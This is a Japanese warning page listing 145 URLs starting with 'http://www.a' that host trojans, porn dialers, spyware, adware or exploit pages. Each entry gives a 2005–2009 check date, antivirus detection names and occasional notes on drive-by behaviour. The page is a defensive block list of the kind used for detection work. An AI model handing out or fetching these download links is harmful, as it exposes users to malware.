Kiken URL List
http:// www. a から始まるURL

このページは危険と思われるURLでhttp:// www. a から始まるURLを掲載しています。
他のサイトからこのページに来られた方は最初に Kiken URL List のトップページ をよく読んでください。


Kiken URL List の見方

通し番号.URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説
  ← このようになっています。

  1. http://www.a99b.com/accesso-adulti.exe
    [2006/01/14]バスター無反応だが、以下のアンチウィルスソフトで反応。
    BitDefender → Trojan.StartPage.F
    Dr.Web → Trojan.PWS.Book
    Kaspersky Anti-Virus → Trojan.Win32.Delf.cn
    VBA32 → Trojan.PWS.Book


  2. http://www.a99b.com/contenuti-x-pc.exe
    [2006/08/11]ウィルス名:TROJ_DELF.CGS


  3. http://www.a99b.com/super-adult.exe
    [2006/07/07]ウィルス名:TROJ_DELF.BZY


  4. http://www.a99b.com/videochat.exe
    [2006/07/10]2006/07/08 にトレンドマイクロ社に「videochat.exe」を提出。
    今日、連絡あり。内容は以下の「」内。
    「パターンファイル:3.557.00 にて、「TROJ_DELF.CBC」として検出するよう対応いたしました。」
    実際に「videochat.exe」をDL+解凍してウィルス名:TROJ_DELF.CBC を検出することを確認(=パターンファイル:3.559.00 時 )。
    また、以下のアンチウィルスソフトでも反応する。
    AntiVir → Heuristic/Hijacker (probable variant)
    Dr.Web → Trojan.PWS.Book
    Kaspersky → Trojan.Win32.Delf.cn
    VBA32 → Trojan.PWS.Book
    [2006/08/11]再確認。ウィルス名:DIAL_RASDIAL.X を検出。


  5. http://www.aaacafe.ne.jp/free/itto/main.bbs
    [2005/04/05]「嵐・Jrの裏掲示板」なる名の掲示板らしいが、無限にウィンドウが開き続ける。親元のタスクを強制終了で脱出。
    [2005/05/25]環境により、CPU使用率が100%になってIEが固まる。


  6. http://www.abctrackingteam.com/images/Paris-nude-video.avi.exe
    [2009/04/15]ファイルサイズ:146 KB 。ウィルス名:TROJ_FAKEALER.FO


  7. http://www.abisource.com/mailinglists/abiword-dev/2005/Jun/att-0006/phone_number2.pif
    [2007/01/19]ウィルス名:WORM_NETSKY.GEN


  8. http://www.ac66.cn/88/joke.htm
    [2007/02/01]ウィルス名:VBS_PSYME.GI


  9. http://www.ac66.cn/88/rpp.exe
    [2006/08/24]2006/08/16 にトレンドマイクロ社にファイルを提出。
    今日、連絡があり、ウィルス名:TROJ_DELF.CMO として検出するよう対応した、とのこと。
    2006/08/16 にDLしたファイルからウィルス名:TROJ_DELF.CMO を検出することを確認。
    しかし、今日改めてDLしようとするが、ファイルが無かった。


  10. http://www.ac66.cn/88/xdm.html
    [2007/02/03]真っ白なページで、2007/01/29 の時点でバスター無反応。
    ソースを見ると、shellcode で、コード変換されていた。
    2007/01/29 にトレンドマイクロ社に このURLと、そのソースをhtml形式にして提出。
    2007/02/02 にその結果の連絡があり、ウィルス名:VBS_SMALL.BHL として検出するよう対応した、とのこと。
    しかし、2007/01/29 にDLしたソースからはウィルス名:HTML_IFRAMEBOF.P を検出。
    また、今日改めて当該URLを確認したが、ページは無くなっていた。


  11. http://www.ac66.cn/down/aichong.exe
    [2006/08/24]2006/08/16 にトレンドマイクロ社にファイルを提出。
    今日、連絡があり、ウィルス名:TROJ_AGENT.DWX として検出するよう対応した、とのこと。
    2006/08/16 にDLしたファイルからウィルス名:TROJ_AGENT.DWX を検出することを確認。
    しかし、今日改めてDLしようとするが、ファイルが無かった。


  12. http://www.ac66.cn/down/gezi.exe
    [2006/08/24]2006/08/16 にトレンドマイクロ社にファイルを提出。
    今日、連絡があり、ウィルス名:TSPY_WOW.LK として検出するよう対応した、とのこと。
    2006/08/16 にDLしたファイルからウィルス名:TSPY_WOW.LK を検出することを確認。
    しかし、今日改めてDLしようとするが、ファイルが無かった。


  13. http://www.ac66.cn/down/mhxy.exe
    [2006/08/16]ウィルス名:TSPY_WOW.FQ


  14. http://www.ac66.cn/down/rx.exe
    [2006/08/24]2006/08/16 にトレンドマイクロ社にファイルを提出。
    今日、連絡があり、ウィルス名:TSPY_LEWOR.BL として検出するよう対応した、とのこと。
    2006/08/16 にDLしたファイルからウィルス名:TSPY_LEWOR.BL を検出することを確認。
    しかし、今日改めてDLしようとするが、ファイルが無かった。


  15. http://www.accessoveloce.com/cale/x/ndbk1x.exe
  16. http://www.accessoveloce.com/cit/x/citsex6x.exe
  17. http://www.accessoveloce.com/eno/x/enring1x.exe
  18. http://www.accessoveloce.com/mar/x/celebx2.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  19. http://www.accessoveloce.com/mar/x/igmp4f.exe
    [2006/08/13]ウィルス名:DIAL_THAWS.C


  20. http://www.accessoveloce.com/nd/nd01188.exe
  21. http://www.accessoveloce.com/nd/nd01192.exe
  22. http://www.accessoveloce.com/nd/nd01197.exe
  23. http://www.accessoveloce.com/nd/nd01310.exe
  24. http://www.accessoveloce.com/nd/nd01329.exe
  25. http://www.accessoveloce.com/nd/nd01432.exe
  26. http://www.accessoveloce.com/nd/nd01850.exe
  27. http://www.accessoveloce.com/nd/nd03021.exe
  28. http://www.accessoveloce.com/nd/nd03025.exe
  29. http://www.accessoveloce.com/nd/nd03028.exe
  30. http://www.accessoveloce.com/nd/nd03039.exe
  31. http://www.accessoveloce.com/nd/nd03239.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  32. http://www.accessoveloce.com/univ/geo/x/geoall1x.exe
  33. http://www.accessoveloce.com/univ/geo/x/geoall2x.exe
    [2006/08/18]ウィルス名:DIAL_NEW.A


  34. http://www.accessoveloce.com/univ/scd/x/scdtattoo1x.exe
  35. http://www.accessoveloce.com/univ/ski/x/ujmp1f.exe
  36. http://www.accessoveloce.com/univ/x/sbsex5x.exe
  37. http://www.accessoveloce.com/val/x/vatat3x.exe
  38. http://www.accessoveloce.com/wde/dMi_191.exe
  39. http://www.accessoveloce.com/wde/dMi_193.exe
  40. http://www.accessoveloce.com/webline/Free-Internet_By_Tuttogratis.exe
  41. http://www.accessoveloce.com/webline/t3/Tuttogratis_Free-Internet.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  42. http://www.accessoveloce.com/webline/x/brigida1x.exe
  43. http://www.accessoveloce.com/webline/x/webweb19x.exe
  44. http://www.accessoveloce.com/webline/x/wgodscp1x.exe
  45. http://www.accessoveloce.com/webline/x/wgodscp2x.exe
    [2006/08/13]ウィルス名:DIAL_NEW.A


  46. http://www.accessoveloce.com/webline/x/wla3mp6x.exe
  47. http://www.accessoveloce.com/webline/x/wlaring46x.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  48. http://www.accessoveloce.com/webline/x/wlasex292x.exe
  49. http://www.accessoveloce.com/webline/x/wmdastro8x.exe
  50. http://www.accessoveloce.com/webline/x/wmdsc16x.exe
    [2006/08/13]ウィルス名:DIAL_NEW.A


  51. http://www.accessoveloce.com/webline/x/wmdsex137x.exe
  52. http://www.accessoveloce.com/webline/x/wmdsex220x.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  53. http://www.accessoveloce.com/webline/x/wmdtat40x.exe
    [2006/08/13]ウィルス名:DIAL_RAS.BC


  54. http://www.accessoveloce.com/webline/x/wvhgol1x.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  55. http://www.accessoveloce.com/webline/x/wzdesk1x.exe
    [2006/08/18]ウィルス名:DIAL_NEW.A


  56. http://www.accessoveloce.com/webline/x/wzdesk2x.exe
    [2006/08/18]2006/08/12 にトレンドマイクロ社に各ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_PORNDIAL.LS として検出するよう対応した、とのこと。
    2006/08/12 にDLした各ファイルからウィルス名:DIAL_PORNDIAL.LS を検出することを確認。
    また、改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.LS を検出することを確認。


  57. http://www.accessoveloce.com/webline/x/wzdesk3x.exe
  58. http://www.accessoveloce.com/webline/x/wzdesk4x.exe
  59. http://www.accessoveloce.com/webline/x/wzdesk5x.exe
    [2006/08/18]ウィルス名:DIAL_NEW.A


  60. http://www.accessoveloce.com/webline/x/wzdesk6x.exe
    [2006/08/13]ウィルス名:DIAL_THAWS.A


  61. http://www.accessoveloce.com/webline/x/wzdesk7x.exe
  62. http://www.accessoveloce.com/webline/x/wzdesk8x.exe
    [2006/08/18]ウィルス名:DIAL_NEW.A


  63. http://www.acez.com/downloads/webtools/searchnugget.exe
    [2006/05/07]ウィルス名:SPYW_SNUGGET.A


  64. http://www.acez.com/downloads/webtools/searchToolbar.exe
    [2006/12/01]2006/11/26 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_MEGASEARCH.B として検出するよう対応、とのこと。
    実際に 2006/11/26 にDLしたファイルと今日改めてDLしたファイルからウィルス名:ADW_MEGASEARCH.B を検出することを確認。
    2006/11/26 から今日まではファイルは置き換えられていないと推測される。


  65. http://www.acompanhates.xpg.com.br/cartao.rar
    [2007/01/11]2006/12/30 にトレンドマイクロ社に中身の「cartao.scr」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_BANLOAD.CAX として検出するよう対応、とのこと。
    実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.CAX を検出することを確認。
    2006/12/30 から今日までのファイルの置き換えは無いと推測される。


  66. http://www.activesearch.com/tb/toolbar.cab
    [2006/10/03]DL+解凍すると「toolbar.dll」なるファイルが現れる。
    バスター無反応だが、Kaspersky で「not-a-virus:AdWare.Win32.ISearch.c」を検出する。
    この「toolbar.dll」ファイルを 2006/09/17 にトレンドマイクロ社にを提出。
    今日、その結果の連絡があり、以下のような結果だった。
    「『toolbar.dll』ファイルは Internet Explorer のツールバーに使用されるコンポーネントファイルで、弊社では現在の段階では検出対応しないファイルとなります。」


  67. http://www.activeshopper.com/download/google/setupactiv.exe
    [2007/05/21]2007/04/10 にトレンドマイクロ社にファイルを提出。
    2007/05/16 にその結果の連絡があり、ウィルス名:Adware_ActiveShop として検出するよう対応、とのこと。
    実際に 2007/04/10 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:Adware_ActiveShop を検出することを確認。
    2007/04/10 から今日までのファイルの置き換えは無いと推測される。


  68. http://www.activexobjectpage.com/download/maxsetup.107.exe
    [2006/12/29]2006/12/26 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.DSI として検出するよう対応、とのこと。
    実際に 2006/12/26 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_ZLOB.DSI を検出することを確認。
    2006/12/26 から今日まではファイルは置き換えられていないと推測される。


  69. http://www.activexobjectpage.com/download/maxsetup.1603.exe
    [2006/12/29]2006/12/26 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_ZLOB.DSI として検出するよう対応、とのこと。
    実際に 2006/12/26 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_ZLOB.DSI を検出することを確認。
    2006/12/26 から今日まではファイルは置き換えられていないと推測される。


  70. http://www.activexsoftwares.com/main/vaxsetup.exe
    [2007/01/10]2006/12/10 にトレンドマイクロ社にファイルを提出。
    2006/12/28 にその結果の連絡があり、ウィルス名:TROJ_ZLOB.BWC として検出するよう対応、とのこと。
    しかし、実際に 2006/12/10 にDLしたファイルからはウィルス名:TROJ_ZLOB.DSJ を検出する。
    また、2006/12/28 に再度DLしたファイル、今日改めてDLしたファイルからもウィルス名:TROJ_ZLOB.DSJ を検出する。


  71. http://www.actmon.com/
    [2005/12/10]こんな感じ のスパイウェア配布サイト。販売もしている。このページ表示まで無害で、普通に閉じれる。


  72. http://www.actmon.com/download/actmon-cm-setup.exe
    [2005/12/10]ウィルス名:SPYW_ACTMON.511+SPYW_ACTMON.520
    スパイウェアの一種:キーロガーである。


  73. http://www.acyberhome.com/link/server.exe
    [2007/05/27]ウィルス名:TSPY_MARAN.ND


  74. http://www.acyberhome.com/news/test.cur
    [2007/05/05]ウィルス名:EXPL_ANICMOO.GEN


  75. http://www.ad-zero.com/appinfo/control2/kpu1/file/control3zero1_20080130.exe
    [2009/04/15]ファイルサイズ:85.3 KB 。ウィルス名:TROJ_SMALL.CAV


  76. http://www.adbars.com/promos/buscandoamigos/
    [2005/11/27]スパイウェア配布サイトと思われる。こんな感じ のページで、このページ表示まで無害で、普通に閉じれる。
    ページ画面中央の「HAZ CLICK AQUI PARA instalar la Barra Ahora」というリンクをクリックすると、下のURLに飛び、ウィルス名:SPYW_ADBARS.100を検出。この後の詳細は下のURLのURL List解説を参照。
    //www.contenidospc.com/promociones/frames.php?obj=barra&pagina=http://www.adbars.com/instalame-toolbar


  77. http://www.addictivetechnologies.net/DM0/cab/oo7agfp.cab
    [2005/08/02]DL+解凍すると以下の2つのファイルが現れる。
    1、「ATPartners.inf」← セットアップ情報。無害。
    2、「ATPartners.dll」← バスター無反応だが、以下のアンチウィルスソフトで反応。
    ClamAV → Trojan.Downloader.Rameh-1
    Dr.Web → not a virus Adware.F1Organizer
    Kaspersky Anti-Virus → not-a-virus:AdWare.F1Organizer.c
    NOD32 → Win32/TrojanDownloader.Rameh.C
    VBA32 → AdWare.F1Organizer.c


  78. http://www.addictivetechnologies.net/LoadShare/SplWbr.dll
    [2005/07/18]バスター無反応だが、以下のアンチウィルスソフトで反応。
    ArcaVir → Trojan.Dropper.Small.Sf
    Avast → Win32:Trojan-gen. {Other}
    AVG Antivirus → Dropper.Small.13.BM
    Dr.Web → Trojan.MulDrop.1565
    Fortinet → Adware/180Solutions
    Kaspersky Anti-Virus → Trojan-Dropper.Win32.Small.sf
    NOD32 → Win32/TrojanDropper.Small.SF


  79. http://www.adfka.com/
    [2006/06/12]こんな感じ のサイト。HDDが唸り出し、ウィルス名:TROJ_DLOADER.BZQ を検出。
    何回か確認すると、IEが落ちる場合とフリーズする場合もあった。
    ソースを見ると以下のURLをIFRAMEタグで呼び出している。
    //www.lovetw.webnow.biz/jpcetou/index.htm
    尚、//www.adfka.com/ は不定期的にソースを更新している模様。
    [2006/06/12]他の方の結果は、
    「ただ嶄に便る.......」というテキストの表示と、Realコンテンツに偽装したウイルスを呼び出しています。Win32/Exploit.RealPoc.10.A trojan 検出。」
    [2006/07/01]「マカフィーがトロイの木馬:Exploit-ObscuredHtml を検出しました。中国語圏のアダルトサイトのようです。」


  80. http://www.adfka.com/8876/yahoo.htm
    [2006/07/14]ウィルス名:TROJ_DLOADER.BZQ 。環境により、未検出の場合もあると思われる。


  81. http://www.adfka.com/cimg/index.htm
    [2006/07/17]こんな感じ のページ。バスター無反応だが、他アンチウィルスソフトではウィルス反応がある場合があると思われる。


  82. http://www.adfka.com/j00064-psd225/jcp20536/index.htm
    [2006/05/17]他の方の結果では
    「ClamWin 反応あり。Exploit.W32.RealPoc.10.a 検出。
    Kaspersky 反応あり。Exploit.Win32.RealPoc.10.a 検出。
    リアルプレイヤーをアップデートしていない場合は脆弱性を利用されて危険な可能性ありそうです。アップデートしていれば大丈夫な可能性ありです。」
    [2006/05/18]こんな感じ の画面だが、ウィルス名:TROJ_DLOADER.BZQ を検出。
    何回か確認すると、そのほとんどでIEが落ちる現象を確認。但し、このIE落ちはPC環境により、落ちる場合と落ちない場合があると思われる。
    ソースを見ると下のファイルを再生しようとしているのが分かる。これが元凶。
    //www.adfka.com/j00064-psd225/jcp20536/music.smi
    [2006/05/22]他の方の結果では
    「RealPlayerの警告窓で「要求されたファイルが見つかりません。リンクが古いか、間違っています。」と表示されますがKaspersky反応あり。
    Exploit.Win32.RealPoc.10.a 検出。RealPlayerの脆弱性を狙ったウイルスコードがあるようです。」
    [2006/06/11]「PC有害。 BitDefender にて Exploit.HTML.Downloader.BM.A と判定。iframe で、[http]では無く、[httP] で始まる //www.lovetw.webnow.biz/ 内へ飛び、そこから music.smi をダウンロードさせる。これがウィルス。」
    [2006/06/11]再確認。ソースが変更されている。以下のURLに飛ぶようになっている。
    //www.lovetw.webnow.biz/jpcetou/index.htm
    [2006/06/12]他の方の結果では「Win32:Trojano-3455 [Trj]を検出。」


  83. http://www.adfka.com/j00064-psd225/jcp20536/music.smi
    [2006/05/18]ウィルス名:TROJ_DLOADER.BZQ


  84. http://www.adfka.com/mslin/index.htm
    [2006/07/14]ウィルス名:TROJ_DLOADER.BZQ 。環境により、未検出の場合もあると思われる。


  85. http://www.adigida.com/luba/rk/here/link.html
    [2006/01/05]//85.255.113.242/adv/053/new.php に飛び、こんな感じ のページ。
    踏むとまず、ウィルス名:TROJ_NASCENE.GEN を検出。数秒してウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
    IFRAMEタグで、//85.255.113.242/adv/053/new.php を呼び出しているのが原因。


  86. http://www.administrative-law.seks-anons.pl
    [2006/10/18]海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
    ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。
    //67.15.114.122/my_stat.php


  87. http://www.adobeus.com/go/getflashplayer/flashplayer.exe
    [2009/05/04]ファイルサイズ:15.5 KB 。ウィルス名:PAK_GENERIC.001


  88. http://www.adsforsite.com/install/crack.exe
  89. http://www.adsforsite.com/install/tload.cab
    [2006/08/16]ウィルス名:TROJ_SMALL.BYR


  90. http://www.adshooter.com/DR_S/DR_S.exe
    [2005/04/04]ウィルス名:TROJ_SMALL.HS


  91. http://www.adshooter.com/pop_shooter/install/win2000/SYSsfitb.cab
    [2005/04/17]ウィルス名:TROJ_ISTBAR.ET


  92. http://www.adshooter.com/pop_shooter/uninstall/ads_unin.exe
    [2008/10/19]ウィルス名:ADW_EZULA.AQ


  93. http://www.adtomi.com/ads/clearer.exe
    [2005/08/19]− 以下は2chでのレス −
    「スパイウェア製造元が出してるクリーナーのようです。
    出来が悪いようで、無実のinternat.exeが起動できなくなりました。」


  94. http://www.adtraffic.net/pr/at_homepage.cab
    [2005/12/09]DL+解凍すると「EEStartup.exe」なるものが現れる。
    バスター無反応だが、以下のアンチウィルスソフトで反応。
    Dr.Web → Trojan.DownLoader.5535, BACKDOOR.Trojan


  95. http://www.adult-women.com/AdServer/short.cab
    [2006/08/13]ウィルス名:TROJ_FAVADD.G


  96. http://www.adultlinksco.com/
    [2005/12/10]スパイウェア配布サイト。こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。
    画面中央やや上よりの「Click here to add free adult links to your browser」というリンクを踏むとディスクトップ画面左上のほうに この小窓 を表示して、このセキュリティ警告 を表示、同時にバスターがウィルス名:SPYW_ADULTLINK.A を検出。
    セキュリティ警告を拒否すると、小窓が こんな感じ になり、約2秒後に小窓は消える。
    セキュリティ警告には以下のURLが書いてあるが、このURLのcabファイルからウィルス名:SPYW_ADULTLINK.A を検出。
    //www.adultlinksco.com/QcBar.cab


  97. http://www.adultlinksco.com/linkzz.html
  98. http://www.adultlinksco.com/linkzz.html?act=2129751.ce:A
    [2005/12/10]踏むと こんな感じ だが、このセキュリティ警告 を表示して、同時にバスターがウィルス名:SPYW_ADULTLINK.A を検出。
    セキュリティ警告を拒否すると こんな感じ になり、勝手に閉じるか、 これ を表示して「閉じれ」と催促してくる。「はい」を選ぶと閉じてそれで終わり。「いいえ」を選ぶと真っ白のページを表示。


  99. http://www.adultlinksco.com/QcBar.cab
    [2005/12/10]ウィルス名:SPYW_ADULTLINK.A


  100. http://www.adultrental.com/?e
    [2005/12/25]海外アダルトサイト。閉じようとすると閉じれず、中くらいのウィンドウでアダルトサイトを新窓表示。その新窓表示されたアダルトサイトはツールバーやアドレスバーが無い。
    新窓表示されたアダルトサイトを閉じると、1〜2秒置いて中くらいのウィンドウで違うアダルトサイトを新窓表示。これもツールバーやアドレスバーが無い。
    2回目の新窓表示されたアダルトサイトを閉じると、1〜2秒置いて中くらいのウィンドウで違うアダルトサイトを新窓表示。これもツールバーやアドレスバーが無い。
    これを繰り返し、6回目の新窓表示されたアダルトサイトを表示した時点で、ウィルス名:TROJ_ISTBAR.ET を検出。
    この6回表示されたアダルトサイトは全てツールバーやアドレスバーが無く、何回確認しても同じ順番でアダルトサイトが表示された。
    6回目の新窓表示されたアダルトサイトを閉じると元の //www.adultrental.com/?e は最小化された状態になっていて、最大化は出来なかった。タスクバーより閉じるで終わる。


  101. http://www.advancedsearchbar.com/asbsetup.exe
    [2005/12/10]バスター無反応だが、以下のアンチウィルスソフトで反応。このツールバー のファイルである。
    Dr.Web → Adware.SideSearch


  102. http://www.advnt01.com/dialer/austria.exe
    [2006/07/08]ウィルス名:TROJ_Generic


  103. http://www.advnt01.com/dialer/austria_ver3.CAB
    [2005/04/17]ウィルス名:TROJ_CLICKER.D


  104. http://www.advnt01.com/dialer/austriapep.exe
    [2006/07/08]ウィルス名:DIAL_PORNY.E


  105. http://www.advnt01.com/dialer/canada_ver3.CAB
    [2005/04/17]ウィルス名:TROJ_ADPOWER.C


  106. http://www.advnt01.com/dialer/czeck1_ver3.CAB
    [2006/07/08]ウィルス名:TROJ_ADPOWER.C


  107. http://www.advnt01.com/dialer/emsat.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.C


  108. http://www.advnt01.com/dialer/emsat_ver3.CAB
    [2005/04/17]ウィルス名:ADW_ADPOWER.D


  109. http://www.advnt01.com/dialer/emsat_ver4.CAB
    [2006/07/08]ウィルス名:TROJ_ADPOWER.B


  110. http://www.advnt01.com/dialer/emsat_ver5.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  111. http://www.advnt01.com/dialer/fra_allgl.exe
    [2007/03/08]ウィルス名:TSPY_Clicker


  112. http://www.advnt01.com/dialer/fra_nos.exe
    [2006/11/07]2006/10/16 にトレンドマイクロ社にファイルを提出。
    2006/10/20 にその結果の連絡があり、ウィルス名:DIAL_AMWM.B として検出するよう対応、とのこと。
    実際に 2006/10/16 にDLしたファイルからウィルス名:DIAL_AMWM.B を検出することを確認。
    しかし、今日改めて当該URLを確認してみると404であった。


  113. http://www.advnt01.com/dialer/fra_pagl.exe
    [2006/07/20]2006/07/12 にトレンドマイクロ社にファイルを提出。
    本日、連絡があり、スパイウェアパターンファイル 0.392.05 にてウィルス名:DIAL_RAS.GF として対応とのこと。当ファイルをDLしてウィルスを検出することを確認。


  114. http://www.advnt01.com/dialer/france.exe
    [2006/07/08]ウィルス名:DIAL_CONNECT.M


  115. http://www.advnt01.com/dialer/france_nos.exe
    [2006/07/08]ウィルス名:DIAL_CONNECT.L


  116. http://www.advnt01.com/dialer/france_old.exe
    [2006/07/08]ウィルス名:DIAL_CONNECT.M


  117. http://www.advnt01.com/dialer/france_pa.exe
    [2006/07/08]ウィルス名:DIAL_CONNECT.L


  118. http://www.advnt01.com/dialer/france_sky.exe
    [2006/07/08]ウィルス名:DIAL_CONNECT.L


  119. http://www.advnt01.com/dialer/ger.exe
    [2006/07/08]ウィルス名:DIAL_VAC8.A


  120. http://www.advnt01.com/dialer/ger_nopop.exe
    [2005/04/17]ウィルス名:DIAL_GERNOPOP.A


  121. http://www.advnt01.com/dialer/gerpep_nopop.exe
    [2006/07/08]ウィルス名:DIAL_DC.A


  122. http://www.advnt01.com/dialer/internazionale_ver3.CAB
    [2005/04/17]ウィルス名:DIAL_ADPOWER.B


  123. http://www.advnt01.com/dialer/internazionale_ver4.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.A


  124. http://www.advnt01.com/dialer/internazionale_ver15.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  125. http://www.advnt01.com/dialer/nz.exe
    [2006/07/20]2006/07/12 にトレンドマイクロ社にファイルを提出。
    本日、連絡があり、スパイウェアパターンファイル 0.392.05 にてウィルス名:DIAL_PORNDIAL.KQ として対応とのこと。
    当ファイルをDLしてウィルスを検出することを確認。


  126. http://www.advnt01.com/dialer/olanda_ver2.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.E


  127. http://www.advnt01.com/dialer/olanda_ver3.CAB
    [2005/04/17]ウィルス名:TROJ_ADPOWER.A


  128. http://www.advnt01.com/dialer/olanda_ver4.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.F


  129. http://www.advnt01.com/dialer/olanda_ver5.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.G


  130. http://www.advnt01.com/dialer/russia.CAB
    [2005/04/17]ウィルス名:TROJ_ADPOWER.G


  131. http://www.advnt01.com/dialer/spain_ver3.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  132. http://www.advnt01.com/dialer/usa_cic.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  133. http://www.adwarepunisher.com/
    [2006/02/20]スパイウェア駆除ソフト配布を装った「スパイウェア配布サイト」である。
    こんな感じ のサイト。このページ表示まで無害で普通に閉じれる。


  134. http://www.affiliazione1.com/download/af001.exe
    [2007/02/22]2007/02/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_AKYT.A として検出するよう対応、とのこと。
    実際に 2007/02/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_AKYT.A を検出することを確認。
    2007/02/09 から今日まではファイルの置き換えは無いと推測される。


  135. http://www.affiliazione1.com/download/af002.exe
    [2007/02/22]2007/02/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_AKYT.B として検出するよう対応、とのこと。
    実際に 2007/02/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_AKYT.B を検出することを確認。
    2007/02/09 から今日まではファイルの置き換えは無いと推測される。


  136. http://www.affiliazione1.com/download/af003.exe
    [2007/02/22]2007/02/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_AKYT.C として検出するよう対応、とのこと。
    実際に 2007/02/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_AKYT.C を検出することを確認。
    2007/02/09 から今日まではファイルの置き換えは無いと推測される。


  137. http://www.affiliazione1.com/download/af010.exe
    [2006/09/01]2006/08/13 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.JY として検出するよう対応、とのこと。
    2006/08/13 にDLしたファイルからウィルス名:DIAL_DIALER.JY を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_DIALER.JY を検出することを確認。


  138. http://www.affiliazione1.com/download/af179.exe
    [2007/02/09]2007/02/01 にトレンドマイクロ社にファイルを提出。
    2007/02/06 にその結果の連絡があり、ウィルス名:DIAL_TRUSTEDZO.F として検出するよう対応、とのこと。
    実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_TRUSTEDZO.F を検出することを確認。
    2007/02/01 から今日まではファイルは置き換えられていないと推測される。


  139. http://www.affiliazione1.com/download/af183.exe
    [2007/02/09]2007/02/01 にトレンドマイクロ社にファイルを提出。
    2007/02/06 にその結果の連絡があり、ウィルス名:DIAL_TRUSTEDZO.G として検出するよう対応、とのこと。
    実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_TRUSTEDZO.G を検出することを確認。
    2007/02/01 から今日まではファイルは置き換えられていないと推測される。


  140. http://www.affiliazione1.com/download/af185.exe
    [2007/04/21]2007/02/01 にトレンドマイクロ社にファイルを提出。
    2007/02/06 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2007/02/01 から今日までの間にファイルの置き換えは無いと推測される。


  141. http://www.affiliazione1.com/download/af254.exe
  142. http://www.affiliazione1.com/download/af255.exe
    [2008/10/19]ウィルス名:TROJ_DIALER.DH


  143. http://www.affiliazione1.com/download/af256.exe
    [2008/10/19]ウィルス名:TROJ_DIALER.ZL


  144. http://www.affiliazione1.com/download/af257.exe
  145. http://www.affiliazione1.com/download/af258.exe
